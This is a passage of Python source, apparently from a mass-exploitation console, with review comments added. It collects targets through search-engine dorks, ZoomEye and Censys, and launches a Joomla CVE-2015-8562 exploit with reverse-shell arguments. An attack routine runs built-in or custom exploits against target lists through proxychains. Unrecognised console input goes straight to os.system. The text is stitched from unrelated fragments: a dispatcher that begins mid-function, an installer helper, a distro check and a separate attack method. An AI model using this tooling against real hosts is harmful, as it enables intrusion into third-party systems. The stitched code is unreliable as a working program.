        colored_print('[i] Target changed to {}'.format(target), colors.BLUE)
        SESSION.ip_list = SESSION.init_dir + \
            '/data/' + target
    elif cmd in ('init', 'i'):
        colored_print('[*] Going back to init_dir...', colors.BLUE)
        os.chdir(SESSION.init_dir)
    elif cmd.startswith('baidu'):
        try:
            command = cmd.strip().split()
            dork = command[1]
            count = int(command[2])
            os.chdir(SESSION.out_dir)
            colored_print('[*] Searching on Baidu...', colors.PURPLE)
            baidu.spider(dork, count)
            if yes_no("Use collected URL's as target?"):
                # NOTE(review): the crawl ran inside out_dir, but this path
                # is built from init_dir and without a "/" separator -
                # confirm which file is meant.
                SESSION.ip_list = SESSION.init_dir + "result.txt"
        except (IndexError, EOFError, KeyboardInterrupt, SystemExit):
            # Missing arguments and interrupts both end the command quietly.
            return
    elif cmd == 'proxy':
        # NOTE(review): a missing config is reported, but the proxy binary
        # is still started afterwards - there is no early return.
        if not os.path.exists(SESSION.ss_config):
            console.print_error('[-] Please make sure {} exists'.format(
                SESSION.ss_config))
        try:
            # Argument list with shell=False: nothing here is parsed by a
            # shell. Both pipes are created but not read in this function.
            subprocess.Popen([SESSION.proxy_bin, '-c', SESSION.ss_config],
                             stderr=subprocess.PIPE,
                             stdout=subprocess.PIPE,
                             shell=False)
        except BaseException as err:
            console.print_error('[-] Error starting Shadowsocks proxy: ' +
                                str(err))
            debug_except()
    elif cmd == 'redis':
        console.print_error('[-] Under development')
    elif cmd.startswith('google'):
        try:
            # From here on `cmd` is a list of words, not the input string.
            cmd = cmd.strip().split()
            dork = cmd[1]
            # well yes im a lazy guy
            # Every argument except the dork is a fixed literal.
            subprocess.call([
                './exploits/joomla/joomlaCVE-2015-8562.py', '--dork', dork,
                '--revshell=\'127.0.0.1\'', '--port=4444'
            ])
        except BaseException as err:
            console.print_error(str(err))
            debug_except()
    elif cmd in ('q', 'quit'):
        check_kill_process('ss-proxy')
        sys.exit(0)
    elif cmd in ('h', 'help', '?'):
        print(console.HELP_INFO)
    elif cmd == 'exploits':
        colored_print('[+] Available exploits: ', colors.CYAN)
        for poc in list_exp():
            colored_print(poc, colors.BLUE)
    elif cmd in ('z', "zoomeye"):
        try:
            console.print_warning(
                "[*] ZoomEye now asks for phone verification (+86 only)")
            zoomeye.run()
        except (EOFError, KeyboardInterrupt, SystemExit):
            pass
        else:
            # NOTE(review): as written, debug_except() runs on the success
            # path (no exception raised) - confirm that this is intended.
            debug_except()
    elif cmd == "censys":
        try:
            output = censys.start()
            if yes_no("Use collected URL's as target?"):
                SESSION.ip_list = SESSION.init_dir + "/" + output
                colored_print(
                    '[i] Target changed to {}'.format(SESSION.ip_list),
                    colors.BLUE)
        except BaseException:
            # Every failure, interrupts included, is dropped silently here.
            return
    elif cmd in ('x', 'reset'):
        os.system("reset")
    elif cmd in ('c', 'clear'):
        os.system("clear")
    elif cmd in ("attack", "e"):
        attack()
    else:
        try:
            print(colors.BLUE + colors.BOLD + "[*] Exec: " + colors.END,
                  colors.GREEN + cmd, colors.END)
            # Unrecognised input goes to the system shell verbatim. That is
            # only acceptable because the text comes from the local operator;
            # this function must never be fed input from another source.
            os.system(cmd)
        except (EOFError, KeyboardInterrupt, SystemExit):
            return
def pip_install(venv_py, pkg):
    '''
    Run "<venv_py> -m pip install <pkg>" through the shell.

    Announces the package first. The exit status of the command is not
    inspected and nothing is returned.
    '''
    colors.colored_print(f"Installing {pkg} ... ", colors.BLUE)

    # Both values are placed into the shell command unquoted (which is also
    # why "~" in venv_py and multi-word pkg values work), so they must be
    # trusted, fixed strings chosen by the installer itself.
    shell_line = f'{venv_py} -m pip install {pkg}'
    os.system(shell_line)
def mod_exists(modulename):
    '''
    check if a module exists without importing it

    Returns True when util.find_spec() yields a spec for `modulename` and
    False when it returns None. `util` is presumably importlib.util -
    confirm against the file's imports.
    '''
    mod_spec = util.find_spec(modulename)
    return mod_spec is not None


# distro check and initial packages
# DIST keeps this default unless one of the lookups below replaces it.
DIST = "debian"

try:
    import distro
except ModuleNotFoundError:
    # NOTE(review): loading this file runs an unpinned `pip install` from
    # the package index as a side effect. Declaring `distro` as a normal,
    # pinned dependency would avoid fetching code at import time.
    if os.system("python3 -m pip install distro --user") != 0:
        colors.colored_print("Please install pip first !!!", colors.RED)
        sys.exit(1)
    # Import only if the freshly installed module can actually be found.
    if mod_exists("distro"):
        import distro
except ImportError:
    colors.colored_print("Please use python 3.6+ !!!", colors.RED)
    sys.exit(1)

try:
    DIST = distro.linux_distribution(full_distribution_name=False)[0]
except NameError:
    # Reached when `distro` was never bound above.
    # platform.linux_distribution() was removed in Python 3.8, so on newer
    # interpreters this fallback raises AttributeError.
    import platform
    # pylint: disable=deprecated-method, no-member
    DIST = platform.linux_distribution(full_distribution_name=0)[0].lower()
def attack(self):
    '''
    Interactive front end of the `attack` command.

    Asks whether a proxy should be used and how long to wait between process
    launches, then either runs a built-in module looked up in
    exploit_exec.EXPLOIT_DICT or collects the path, job count and arguments
    of a module chosen from futil.list_exp() and runs it through Scanner.
    '''
    self.use_proxy = console.yes_no(
        '[?] Do you wish to use proxy_pool/proxychains?')
    if self.use_proxy:
        # Stop early when the proxychains4 binary is not on PATH.
        if shutil.which("proxychains4") is None:
            console.print_error("proxychains4 not found")
            return
    # sleep between two subprocess open
    sleep_seconds = console.input_check("\n[?] Wait how many seconds" +
                                        " before each process launch?\n" +
                                        " (Set it to 0 when you want to use 100% CPU" +
                                        " / bandwidth\n Recommened value: 0.1)\n" +
                                        "\n[=] Your input: ",
                                        check_type=float)
    # The page shows this literal on one line; the backslash continuations
    # are restored here without indentation - confirm against the upstream
    # layout.
    answ = console.input_check(
        '\n[?] Do you wish to use\
\n\n [1] built-in exploits\
\n [2] or launch your own manually?\
\n\n[=] Your choice: ',
        choices=['1', '2', 'built-in', 'manually'])
    if answ in ['1', 'built-in']:
        print(
            colors.CYAN +
            colors.BOLD +
            '\n[?] Choose a module from: ' +
            colors.END +
            '\n')
        colors.colored_print(futil.BUILT_IN, colors.GREEN)
        # The accepted names are the lines of futil.BUILT_IN.
        module = console.input_check(
            "[?] Choose your exploit module: ",
            choices=futil.BUILT_IN.split('\n'),
            allow_blank=False)
        try:
            # NOTE(review): if `module` has no entry in EXPLOIT_DICT, .get()
            # returns None and calling it raises TypeError, which the except
            # clause below does not catch - confirm that BUILT_IN and
            # EXPLOIT_DICT always agree.
            scanner_instance = exploit_exec.EXPLOIT_DICT.get(module)(self)
            # A module front end returns None when it gave up on its inputs.
            if scanner_instance is None:
                return
            scanner_instance.sleep_seconds = sleep_seconds
            scanner_instance.scan()
            return
        except (EOFError, KeyboardInterrupt, SystemExit):
            return
    # run custom exploits
    print(
        colors.CYAN +
        colors.UNDERLINE +
        colors.BOLD +
        "\nWelcome, in here you can invoke your own exploit\n" +
        colors.END)
    cmd.run_exploits()
    # The path must be one of the entries returned by futil.list_exp().
    exploit = console.input_check(
        "\n[*] Enter the path (eg. test/test) to your exploit: ",
        choices=futil.list_exp())
    jobs = int(
        console.input_check("[?] How many processes each time? ", check_type=int))
    # Extra arguments are split on whitespace; quoting is not honoured.
    custom_args = console.input_check(
        "[*] Addtional args for this exploit (other than `-t <target>`): ").strip().split()
    # parse user's exploit name
    # exec_path drops the first path component, work_path drops the last.
    exec_path = exploit.split('/')[1:]
    work_path = exploit.split('/')[:-1]
    exec_path = '/'.join(exec_path)
    work_path = '/'.join(work_path)
    # args as parameter for scanner
    scanner_instance = Scanner(work_path, exec_path,
                               custom_args, jobs, sleep_seconds, self)
    # start scanner
    scanner_instance.scan()